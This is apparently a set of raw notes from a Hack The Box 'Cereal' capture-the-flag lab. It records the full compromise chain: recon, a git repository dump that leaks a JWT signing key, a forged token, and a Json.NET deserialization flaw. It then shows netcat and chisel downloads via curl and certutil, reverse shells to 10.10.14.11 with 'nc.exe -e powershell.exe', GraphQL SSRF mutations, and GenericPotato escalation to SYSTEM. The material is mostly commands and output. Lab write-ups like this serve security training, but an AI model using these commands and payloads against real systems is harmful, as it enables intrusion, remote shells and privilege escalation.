$ nmap --min-rate 3000 -oN nmap-tcp.initial -p- -Pn -T4 -v 10.10.10.217




$ nmap -oN nmap-tcp -p 22,80,443 -sC -sV -v 10.10.10.217  

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 08:8e:fe:04:8c:ad:6f:df:88:c7:f3:9a:c5:da:6d:ac (RSA)
|   256 fb:f5:7b:a1:68:07:c0:7b:73:d2:ad:33:df:0a:fc:ac (ECDSA)
|_  256 cc:0e:70:ec:33:42:59:78:31:c0:4e:c2:a5:c9:0e:1e (ED25519)
80/tcp  open  http     Microsoft IIS httpd 10.0
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Did not follow redirect to https://10.10.10.217/
443/tcp open  ssl/http Microsoft IIS httpd 10.0
|_http-favicon: Unknown favicon MD5: 1A506D92387A36A4A778DF0D60892843
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Cereal
| ssl-cert: Subject: commonName=cereal.htb
| Subject Alternative Name: DNS:cereal.htb, DNS:source.cereal.htb
| Issuer: commonName=cereal.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-11-11T19:57:18
| Not valid after:  2040-11-11T20:07:19
| MD5:   8785 41e5 4962 7041 af57 94e3 4564 090d
|_SHA-1: 5841 b3f2 29f0 2ada 2c62 e1da 969d b966 57ad 5367
|_ssl-date: 2021-04-11T15:30:16+00:00; +1s from scanner time.
| tls-alpn: 
|_  http/1.1
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

$ sudo nmap -oN nmap-udp -sU -Pn -v 10.10.10.217

---

$ curl -I http://10.10.10.217                      
HTTP/1.1 307 Temporary Redirect
Transfer-Encoding: chunked
Location: https://10.10.10.217/
Server: Microsoft-IIS/10.0
X-Rate-Limit-Limit: 5m
X-Rate-Limit-Remaining: 149
X-Rate-Limit-Reset: 2021-04-11T15:34:18.7370332Z
X-Powered-By: Sugar
Date: Sun, 11 Apr 2021 15:29:18 GMT

____
----
c:\windows\system32\inetsrv> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Web.Services\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.Services.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.WorkflowServices\v4.0_4.0.0.0__31bf3856ad364e35\System.WorkflowServices.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.Linq.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel.Web\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Web.dll" /R:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Data.DataSetExtensions\v4.0_4.0.0.0__b77a5c561934e089\System.Data.DataSetExtensions.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ComponentModel.DataAnnotations\v4.0_4.0.0.0__31bf3856ad364e35\System.ComponentModel.DataAnnotations.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Web.DynamicData\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.DynamicData.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Web.ApplicationServices\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.ApplicationServices.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel.Activation\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Activation.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Configuration\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel.Activities\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Activities.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.Xml.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Activities\v4.0_4.0.0.0__31bf3856ad364e35\System.Activities.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Runtime.Serialization\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Serialization.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_64\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll" /out:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\c2032773\855af3a6\App_Web_templdfp.dll" /debug- /optimize+ /w:4 /nowarn:1659;1699;1701;612;618 /warnaserror-  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\c2032773\855af3a6\App_Web_templdfp.0.cs" "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\root\c2032773\855af3a6\App_Web_templdfp.1.cs"


Microsoft (R) Visual C# Compiler version 4.7.3190.0

for C# 5
Copyright (C) Microsoft Corporation. All rights reserved.


This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240

c:\inetpub\source\default.aspx(3,24): error CS1519: Invalid token '>' in class, struct, or interface member declaration
----
____

$ nikto -host https://source.cereal.htb -output 443_nikto.txt

$ gobuster dir -k -o 443_gobuster.txt -u https://cereal.htb -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x txt,aspx


$ gobuster dir -k -o 443_source_gobuster.txt -u https://source.cereal.htb -w /usr/share/wordlists/dirb/common.txt -x txt,aspx

$ curl -X OPTIONS -I -k https://source.cereal.htb 
HTTP/2 200 
allow: OPTIONS, TRACE, GET, HEAD, POST
server: Microsoft-IIS/10.0
public: OPTIONS, TRACE, GET, HEAD, POST
x-powered-by: Sugar
date: Sun, 11 Apr 2021 15:48:17 GMT
content-length: 0

$ ./git-dumper/git_dumper.py -j 1 -r 2 -t 5 https://source.cereal.htb/ ./source_git



$ tree source_git
source_git
├── ApplicationOptions.cs
├── appsettings.Development.json
├── appsettings.json
├── CerealContext.cs
├── Cereal.csproj
├── ClientApp
│   ├── package.json
│   ├── package-lock.json
│   ├── public
│   │   ├── favicon.ico
│   │   ├── FuturaStd-Bold.woff
│   │   ├── index.html
│   │   ├── logo192.png
│   │   ├── logo512.png
│   │   ├── manifest.json
│   │   └── robots.txt
│   ├── README.md
│   └── src
│       ├── AdminPage
│       │   ├── AdminPage.jsx
│       │   └── index.js
│       ├── App
│       │   ├── App.css
│       │   ├── App.jsx
│       │   └── index.js
│       ├── _components
│       │   ├── index.js
│       │   └── PrivateRoute.jsx
│       ├── _helpers
│       │   ├── auth-header.js
│       │   ├── handle-response.js
│       │   ├── history.js
│       │   └── index.js
│       ├── HomePage
│       │   ├── HomePage.jsx
│       │   └── index.js
│       ├── index.jsx
│       ├── LoginPage
│       │   ├── index.js
│       │   └── LoginPage.jsx
│       └── _services
│           ├── authentication.service.js
│           ├── index.js
│           └── request.service.js
├── Controllers
│   ├── RequestsController.cs
│   └── UsersController.cs
├── DownloadHelper.cs
├── ExtensionMethods.cs
├── IPAddressHandler.cs
├── IPRequirement.cs
├── Migrations
│   ├── 20191105055735_InitialCreate.cs
│   ├── 20191105055735_InitialCreate.Designer.cs
│   └── CerealContextModelSnapshot.cs
├── Models
│   ├── AuthenticateModel.cs
│   ├── CerealModel.cs
│   ├── Request.cs
│   └── User.cs
├── Pages
│   ├── Error.cshtml
│   ├── Error.cshtml.cs
│   └── _ViewImports.cshtml
├── Program.cs
├── Properties
│   └── launchSettings.json
├── Services
│   └── UserService.cs
└── Startup.cs

---

$ cat Services/UserService.cs

using System;
using System.Collections.Generic;
using System.IdentityModel.Tokens.Jwt;
using System.Linq;
using System.Security.Claims;
using System.Text;
using Microsoft.Extensions.Options;
using Microsoft.IdentityModel.Tokens;
using Cereal.Models;
using Cereal.Helpers;

namespace Cereal.Services
{
    public interface IUserService
    {
        User Authenticate(string username, string password);
    }

    public class UserService : IUserService
    {
         public User Authenticate(string username, string password)
        {
            using (var db = new CerealContext())
            {
                var user = db.Users.Where(x => x.Username == username && x.Password == password).SingleOrDefault();

                // return null if user not found
                if (user == null)
                    return null;

                // authentication successful so generate jwt token
                var tokenHandler = new JwtSecurityTokenHandler();
                var key = Encoding.ASCII.GetBytes("****");
                var tokenDescriptor = new SecurityTokenDescriptor
                {
                    Subject = new ClaimsIdentity(new Claim[]
                    {
                        new Claim(ClaimTypes.Name, user.UserId.ToString())
                    }),
                    Expires = DateTime.UtcNow.AddDays(7),
                    SigningCredentials = new SigningCredentials(new SymmetricSecurityKey(key), SecurityAlgorithms.HmacSha256Signature)
                };
                var token = tokenHandler.CreateToken(tokenDescriptor);
                user.Token = tokenHandler.WriteToken(token);

                return user.WithoutPassword();
            }
        }
    }
}   

----
$ cat .git/logs/HEAD   
0000000000000000000000000000000000000000 8f2a1a88f15b9109e1f63e4e4551727bfb38eee5 Count Chocula <chocula@cere.al> 1573789070 -0600	commit (initial): CEREAL!!
8f2a1a88f15b9109e1f63e4e4551727bfb38eee5 7bd9533a2e01ec11dfa928bd491fe516477ed291 Sonny <sonny@cere.al> 1573789206 -0600	commit: Security fixes
7bd9533a2e01ec11dfa928bd491fe516477ed291 3a23ffe921530036a4e0c355e6c8d1d4029cb728 Sonny <sonny@cere.al> 1573789555 -0600	commit: Image updates
3a23ffe921530036a4e0c355e6c8d1d4029cb728 34b68232714f841a274050591ff5595dcf7f85da Sonny <sonny@cere.al> 1578439144 -0600	commit: Some changes

$ ./GitTools/Extractor/extractor.sh source_git/ ./commits

$ diff ../commits/1-8f2a1a88f15b9109e1f63e4e4551727bfb38eee5/Services/UserService.cs ./Services/UserService.cs

33c33
<                 var key = Encoding.ASCII.GetBytes("secretlhfIH&FY*#oysuflkhskjfhefesf");
---
>                 var key = Encoding.ASCII.GetBytes("****");
----


---
$ cat  ./ClientApp/src/AdminPage/AdminPage.jsx

import React from 'react';
import { MarkdownPreview } from 'react-marked-markdown';
import { requestService, authenticationService } from '../_services';
import { Accordion, Card, Button } from 'react-bootstrap'

class RequestCard extends React.Component {
    componentDidCatch(error) {
        console.log(error);
    }

    render() {
        try {
            let requestData;
            try {
                requestData = JSON.parse(this.props.request.json);
            } catch (e) {
                requestData = null;
            }
            return (
                <Card>
                    <Card.Header>
                        <Accordion.Toggle as={Button} variant="link" eventKey={this.props.request.requestId} name="expand" id={this.props.request.requestId}>
                            {requestData && requestData.title && typeof requestData.title == 'string' && 
                                <MarkdownPreview markedOptions={{ sanitize: true }} value={requestData.title} />
                            }
                        </Accordion.Toggle>
                    </Card.Header>
                    <Accordion.Collapse eventKey={this.props.request.requestId}>
                        <div>
                            {requestData &&
                                <Card.Body>
                                    Description:{requestData.description}
                                    <br />
                                    Color:{requestData.color}
                                    <br />
                                    Flavor:{requestData.flavor}
                                </Card.Body>
                            }
                        </div>
                    </Accordion.Collapse>
                </Card>
            );
        } catch (e) { console.log(e); return null };
    }
}

class AdminPage extends React.Component {
    constructor(props) {
        super(props);

        this.state = {
            requests: null,
        };
    }

    componentDidMount() {
        requestService.getCerealRequests().then(requests => this.setState({ requests }));
    }

    render() {
        const { requests } = this.state;
        return (
            <div className="card card-body bg-light">
                <h3>Current cereal requests:</h3>
                {requests &&
                    <Accordion>
                    {requests.map(request =>
                        <>
                            <RequestCard request={request}/>
                            <br />
                        </>
                    )}
                    </Accordion>
                }
            </div>
        );
    }
}

export { AdminPage }; 

---

$ cat ./ClientApp/src/_services/request.service.js 

import { authHeader, handleResponse } from '../_helpers';

export const requestService = {
    requestCereal,
    getCerealRequests
};

function requestCereal(json) {
    const requestOptions = {
        method: 'POST',
        headers: authHeader(),
        body: JSON.stringify({ json })
    };
    return fetch('/requests', requestOptions).then(handleResponse);
}

function getCerealRequests() {
    const requestOptions = {
        method: 'GET',
        headers: authHeader()
    };
    return fetch('/requests', requestOptions).then(handleResponse);
}    

---

$ cat ./ClientApp/src/_services/authentication.service.js 

import { BehaviorSubject } from 'rxjs';
import { handleResponse } from '../_helpers';

const currentUserSubject = new BehaviorSubject(JSON.parse(localStorage.getItem('currentUser')));

export const authenticationService = {
    login,
    logout,
    currentUser: currentUserSubject.asObservable(),
    get currentUserValue () { return currentUserSubject.value }
};

function login(username, password) {
    const requestOptions = {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ username, password })
    };

    return fetch('/users/authenticate', requestOptions)
        .then(handleResponse)
        .then(user => {
            // store user details and jwt token in local storage to keep user logged in between page refreshes
            localStorage.setItem('currentUser', JSON.stringify(user));
            currentUserSubject.next(user);

            return user;
        });
}

function logout() {
    // remove user from local storage to log user out
    localStorage.removeItem('currentUser');
    currentUserSubject.next(null);
}

---

$ cat auth-header.js 
import { authenticationService } from '../_services';

export function authHeader() {
    // return authorization header with jwt token
    const currentUser = authenticationService.currentUserValue;
    if (currentUser && currentUser.token) {
        return { Authorization: `Bearer ${currentUser.token}`, 'Content-Type': 'application/json' };
    } else {
        return {};
    }
}       

---

$ cat RequestsController.cs                        
using Microsoft.AspNetCore.Mvc;
using Microsoft.AspNetCore.Authorization;
using System.Linq;
using Cereal.Models;
using Cereal.Services;
using Newtonsoft.Json;
using System;

namespace Cereal.Controllers
{
    [Authorize]
    [ApiController]de
    [Route("[controller]")]
    public class RequestsController : ControllerBase
    {
        [HttpPost]
        public IActionResult Create([FromBody]Request request)
        {
            using (var db = new CerealContext())
            {
                try
                {
                    db.Add(request);
                    db.SaveChanges();
                } catch {
                    return BadRequest(new { message = "Invalid request" });
                }
            }

            return Ok(new { message = "Great cereal request!", id = request.RequestId});
        }

        [Authorize(Policy = "RestrictIP")]
        [HttpGet("{id}")]
        public IActionResult Get(int id)
        {
            using (var db = new CerealContext())
            {
                string json = db.Requests.Where(x => x.RequestId == id).SingleOrDefault().JSON;
                // Filter to prevent deserialization attacks mentioned here: https://github.com/pwntester/ysoserial.net/tree/master/ysoserial
                if (json.ToLower().Contains("objectdataprovider") || json.ToLower().Contains("windowsidentity") || json.ToLower().Contains("system"))
                {
                    return BadRequest(new { message = "The cereal police have been dispatched." });
                }
                var cereal = JsonConvert.DeserializeObject(json, new JsonSerializerSettings
                {
                    TypeNameHandling = TypeNameHandling.Auto
                });
                return Ok(cereal.ToString());
            }
        }

---

Session Generation

1. /login (./source_git/ClientApp/src/LoginPage/LoginPage.jsx)
2. ./source_git/ClientApp/src/_services/authentication.service.js
3. ./source_git/ClientApp/src/_helpers/handle-response.js

$ date -d +7days +%s

1618767777

---

POST /requests HTTP/1.1

Host: cereal.htb

Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiamViaWRpYWgiLCJleHAiOjE2MTg3Njc3Nzd9.0LZ04PBGxrvVmwszLyYGazNnYSMXnwF-c4kb_ro7ms4

Content-Type: application/json

Content-Length: 25



{"JSON": {"test":"test"}}

---

curl.exe --output C:\Users\Public\Music\nc.exe http://10.10.14.11/nc.exe

dir C:\Users\Public\Music

C:\Users\Public\Music\nc.exe 10.10.14.11 443 -e powershell.exe

---

PS C:\windows\system32\inetsrv> whoami

  cereal\sonny

PS C:\windows\system32\inetsrv> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

PS C:\windows\system32\inetsrv> netstat -ano | findstr LISTENING | findstr 0.0.0.0

  TCP    0.0.0.0:22             0.0.0.0:0              LISTENING       1652
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       852
  TCP    0.0.0.0:443            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:8172           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       464
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       304
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1044
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       600
  TCP    0.0.0.0:49671          0.0.0.0:0              LISTENING       608
  TCP    10.10.10.217:139       0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:49668        0.0.0.0:0              LISTENING       3432
  TCP    127.0.0.1:49672        0.0.0.0:0              LISTENING       3764

PS C:\windows\system32\inetsrv> certutil.exe -urlcache -f http://10.10.14.11/chisel.exe C:\Users\Public\Music\chisel.exe

****  Online  ****
CertUtil: -URLCache command completed successfully.

PS C:\windows\system32\inetsrv> C:\Users\Public\Music\chisel.exe client http://10.10.14.11:4444 R:8080:127.0.0.1:8080

---

<script>
    fetch('/api/graphql', {
        method: 'POST',
        headers: {
            'Content-Type': 'application/json',
            'Accept': 'application/json',
        },
        body: JSON.stringify({ query: "{ allPlants { id, location, status } }" })
    }).then(r => r.json()).then(r => r.data.allPlants.forEach(d => document.getElementById('opstatus').innerHTML += `<tr><th scope="row">${d.id}</th><td>${d.location}</td><td>${d.status}</td></tr>`))
</script>

---

POST /api/graphql HTTP/1.1
Host: localhost:8080
Content-Length: 0
Content-Type: application/json


{"query":"{allPlants{id,location,status}}"}

{"query":"{__schema{types{name}}}"}

{"query":"mutation{updatePlant}"}

{"query":"mutation{updatePlant(plantId:3, version:6.9, sourceURL:\"http://10.10.14.11\")}"}

---

C:\Users\Public\Music\nc.exe 10.10.14.11 1234 -e powershell.exe

PS C:\windows\system32\inetsrv> certutil.exe -urlcache -f http://10.10.14.11/GenericPotato.exe C:\Users\Public\Music\gp.exe

PS C:\Users\Public\Music> .\gp.exe --help
.\gp.exe --help
GenericPotato by @micahvandeusen
  Modified from SweetPotato by @_EthicalChaos_

  -m, --method=VALUE         Auto,User,Thread (default Auto)
  -p, --prog=VALUE           Program to launch (default cmd.exe)
  -a, --args=VALUE           Arguments for program (default null)
  -e, --exploit=VALUE        Exploit mode [HTTP|NamedPipe(default)]
  -l, --port=VALUE           HTTP port to listen on (default 8888)
  -i, --host=VALUE           HTTP host to listen on (default 127.0.0.1)
  -h, --help                 Display this help
PS C:\Users\Public\Music> .\gp.exe -p "C:\Users\Public\Music\nc.exe" -a "10.10.14.11 42069 -e powershell.exe" -e HTTP -l 1080
.\gp.exe -p "C:\Users\Public\Music\nc.exe" -a "10.10.14.11 42069 -e powershell.exe" -e HTTP -l 1080
GenericPotato by @micahvandeusen
  Modified from SweetPotato by @_EthicalChaos_

[+] Starting HTTP listener on port http://127.0.0.1:1080
[+] Listener ready

---

POST /api/graphql HTTP/1.1
Host: localhost:8080
Content-Length: 94
Content-Type: application/json

{"query":"mutation{updatePlant(plantId:2, version:6.9, sourceURL:\"http://localhost:1080\")}"}

---

$ nc -lvp 42069

PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32> hostname
hostname
Cereal
PS C:\Windows\system32> dir C:\Users\Administrator\Desktop
dir C:\Users\Administrator\Desktop


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----        3/16/2021   4:16 AM      410218330 f.msu                                                                 
-ar---        4/12/2021  12:22 PM             34 root.txt    

---

https://snyk.io/vuln/npm:react-marked-markdown:20180517
https://medium.com/r3d-buck3t/insecure-deserialization-with-json-net-c70139af011a
https://github.com/micahvandeusen/GenericPotato
https://labs.bishopfox.com/tech-blog/design-considerations-for-secure-graphql-apis
https://graphql.org/learn/queries/
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/GraphQL%20Injection#enumerate-database-schema-via-introspection